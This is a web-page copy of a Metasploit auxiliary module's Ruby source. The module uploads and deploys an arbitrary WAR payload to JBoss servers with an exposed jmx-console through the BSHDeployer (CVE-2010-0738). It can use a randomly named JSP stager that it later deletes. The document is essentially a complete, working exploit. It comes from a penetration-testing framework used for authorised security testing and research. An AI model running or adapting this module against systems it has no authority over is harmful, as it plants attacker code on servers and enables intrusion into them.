Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/jboss_bshdeployer.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HTTP::JBoss

8


9
  def initialize

10
    super(

11
      'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',

12
      'Description' => %q{

13
        This module can be used to install a WAR file payload on JBoss servers that have

14
        an exposed "jmx-console" application. The payload is put on the server by

15
        using the jboss.system:BSHDeployer's createScriptDeployment() method.

16
      },

17
      'Author' => [

18
        'us3r777 <us3r777[at]n0b0.so>'

19
      ],

20
      'References' => [

21
        [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST

22
        [ 'OSVDB', '64171' ],

23
        [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],

24
        [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]

25
      ],

26
      'Actions' => [

27
        ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],

28
        ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]

29
      ],

30
      'DefaultAction' => 'Deploy',

31
      'License' => BSD_LICENSE,

32
      'Notes' => {

33
        'Stability' => [CRASH_SAFE],

34
        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK],

35
        'Reliability' => []

36
      }

37
    )

38


39
    register_options(

40
      [

41
        Opt::RPORT(8080),

42
        OptString.new('APPBASE', [ true, 'Application base name', 'payload']),

43
        OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])

44
      ]

45
    )

46
  end

47


48
  def deploy_action(app_base, war_data)

49
    encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')

50


51
    if http_verb == 'POST'

52
      print_status('Deploying payload...')

53
      opts = {

54
        file: "#{app_base}.war",

55
        contents: encoded_payload

56
      }

57
    else

58
      print_status('Deploying stager...')

59
      stager_name = Rex::Text.rand_text_alpha(rand(8..15))

60
      stager_contents = stager_jsp(app_base)

61
      opts = {

62
        dir: "#{stager_name}.war",

63
        file: "#{stager_name}.war/#{stager_name}.jsp",

64
        contents: Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')

65
      }

66
    end

67


68
    bsh_payload = generate_bsh(:create, opts)

69
    package = deploy_bsh(bsh_payload)

70


71
    if package.nil?

72
      print_error('Deployment failed')

73
      return

74
    end

75


76
    print_good('Deployment successful')

77


78
    return if http_verb == 'POST'

79


80
    # call the stager to deploy our real payload war

81
    stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'

82
    payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}"

83
    print_status("Calling stager #{stager_uri} to deploy final payload...")

84
    res = deploy(

85
      'method' => 'POST',

86
      'data' => payload_data,

87
      'uri' => stager_uri

88
    )

89
    if res && res.code == 200

90
      print_good('Payload deployed')

91
    else

92
      print_error('Failed to deploy final payload')

93
    end

94


95
    # Remove the stager

96
    print_status('Removing stager...')

97
    files = {}

98
    files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"

99
    files[:stager_base] = "#{stager_name}.war"

100
    delete_script = generate_bsh(:delete, files)

101
    res = deploy_package(delete_script, package)

102
    if res.nil?

103
      print_error('Unable to remove Stager')

104
    else

105
      print_good('Stager successfully removed')

106
    end

107
  end

108


109
  def undeploy_action(app_base)

110
    # Undeploy the WAR and the stager if needed

111
    print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")

112


113
    files = {}

114
    files[:app_base] = "#{app_base}.war"

115
    delete_script = generate_bsh(:delete, files)

116


117
    package = deploy_bsh(delete_script)

118
    if package.nil?

119
      print_error('Unable to remove WAR')

120
    else

121
      print_good('Successfully removed')

122
    end

123
  end

124


125
  def run

126
    app_base = datastore['APPBASE']

127


128
    case action.name

129
    when 'Deploy'

130
      unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])

131
        print_error('WAR file not found')

132
        return

133
      end

134
      war_data = File.read(datastore['WARFILE'], mode: 'rb')

135
      deploy_action(app_base, war_data)

136
    when 'Undeploy'

137
      undeploy_action(app_base)

138
    end

139
  end

140
end

141


142